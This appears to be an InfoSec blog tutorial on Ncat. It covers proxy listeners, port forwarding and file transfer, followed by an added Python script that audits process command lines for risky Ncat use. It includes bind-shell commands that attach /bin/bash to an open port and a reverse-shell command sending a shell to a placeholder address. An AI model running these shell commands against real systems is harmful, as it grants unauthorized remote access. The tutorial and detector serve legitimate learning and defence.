Neurohazard
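Evening clouds and a misty moon, a lifetime spent poring over the classics; of all the myriad things in the universe, thus have I heard.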

Quickly Creating a Proxy Server with Ncat

wpadmin~September 6, 2018 /InfoSec

Quickly creating a proxy server with Ncat: proxy | reverse shell


Reference approach

Creating a proxy server

Ncat Proxy Options – Ncat Documentation

The currently available protocols in connect mode are http (CONNECT), socks4 (SOCKSv4), and socks5 (SOCKSv5). The only server currently supported is http. If this option is not used, the default protocol is http.

Note: although the --proxy-type parameter accepts socks4 and socks5, Ncat acting as a server currently supports only HTTP.

# HTTP proxy listener wrapped in TLS (--ssl)
ncat --proxy-type http -lvp 7878 --ssl
# Plain HTTP proxy listener
ncat --proxy-type http -lvp 7878
ncat -l 3128 --proxy-type http
# Other examples
# HTTP proxy listener that requires credentials
ncat -l 3128 --proxy-type http --proxy-auth <user>:<pass>

# Connect to example.org on TCP port 8080.
ncat example.org 8080

# Listen for connections on TCP port 8080.
ncat -l 8080

# Redirect TCP port 8080 on the local machine to host on port 80.
ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open

# Bind to TCP port 8081 and attach /bin/bash for the world to access freely.
ncat --exec "/bin/bash" -l 8081 --keep-open

# Bind a shell to TCP port 8081, limit access to hosts on a local
# network, and limit the maximum number of simultaneous connections to 3.
ncat --exec "/bin/bash" --max-conns 3 --allow 192.168.0.0/24 -l 8081 --keep-open

# Connect to smtphost:25 through a SOCKS4 server on port 1080.
ncat --proxy socks4host --proxy-type socks4 --proxy-auth joe smtphost 25

# Connect to smtphost:25 through a SOCKS5 server on port 1080.
ncat --proxy socks5host --proxy-type socks5 --proxy-auth joe:secret smtphost 25

# Create an HTTP proxy server on localhost port 8888.
ncat -l --proxy-type http localhost 8888

# File transfer
# Send a file over TCP port 9899 from host2 (client) to host1 (server).
HOST1$ ncat -l 9899 > outputfile
HOST2$ ncat HOST1 9899 < inputfile

# Transfer in the other direction, turning Ncat into a “one file” server.
HOST1$ ncat -l 9899 < inputfile
HOST2$ ncat HOST1 9899 > outputfile

Reverse shell

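# Server (listener): in listen mode the address and port are positional arguments,
# so -p must not be placed directly in front of the address
ncat -lvv xxx.xxx.xxx.xxx 1212
# Client
ncat -e cmd xxx.xxx.xxx.xxx 1212
# The -e option specifies the binary whose input and output are forwarded over the connection; on Linux this can be /bin/bash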
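
An added example, not part of the original post: a small audit that takes process command lines (for instance from `ps` output or endpoint telemetry) and flags the Ncat invocations shown above that expose a program or an unauthenticated proxy. The function names, finding strings and sample lines are constructed for this illustration, and the short-option table is an assumed subset of Ncat's options.

```python
import shlex

EXEC_LONG = {"--exec", "--sh-exec", "--lua-exec"}  # attach a program to the socket
EXEC_SHORT = {"e", "c"}                            # short forms: -e, -c
ACL_LONG = {"--allow", "--allowfile"}              # restrict client source addresses
TAKES_ARG = set("ecpsgGmdoxiw")  # assumed subset of short options that take a value

def parse(cmdline):
    """Return (long option names, short option letters) of one command line."""
    long_opts, short = set(), set()
    for tok in shlex.split(cmdline)[1:]:
        if tok.startswith("--"):
            long_opts.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            for ch in tok[1:]:           # expand clusters such as -lvp
                short.add(ch)
                if ch in TAKES_ARG:      # the rest of the token is its value
                    break
    return long_opts, short

def audit(cmdline):
    """Return findings for one ncat invocation; an empty list means none."""
    long_opts, short = parse(cmdline)
    listening = "l" in short or "--listen" in long_opts
    runs_program = bool(long_opts & EXEC_LONG or short & EXEC_SHORT)
    findings = []
    if runs_program and listening and not long_opts & ACL_LONG:
        findings.append("listener runs a program with no --allow/--allowfile")
    if runs_program and not listening:
        findings.append("outbound connection with a program attached")
    if listening and "--proxy-type" in long_opts and "--proxy-auth" not in long_opts:
        findings.append("proxy listener without --proxy-auth")
    return findings

# Constructed sample: command lines in the forms used on this page.
SAMPLES = [
    'ncat --exec "/bin/bash" -l 8081 --keep-open',
    'ncat --exec "/bin/bash" --max-conns 3 --allow 192.168.0.0/24 -l 8081 --keep-open',
    "ncat -l 3128 --proxy-type http",
    "ncat -l 3128 --proxy-type http --proxy-auth user:pass",
    "ncat -e cmd 203.0.113.5 1212",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(audit(line) or ["ok"], "<-", line)
```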

pproxy
https://pypi.org/project/pproxy/

References

@倾旋, 我的安全成长口袋 ("My Security Growth Pocket")
https://t.zsxq.com/23J6e23

Chapter 17. Ncat Reference Guide
https://nmap.org/book/ncat-man.html

Proxying
https://nmap.org/ncat/guide/ncat-proxy.html

Proxy Options
https://nmap.org/book/ncat-man-proxy-options.html

Ncat Reference Guide
http://man7.org/linux/man-pages/man1/ncat.1.html
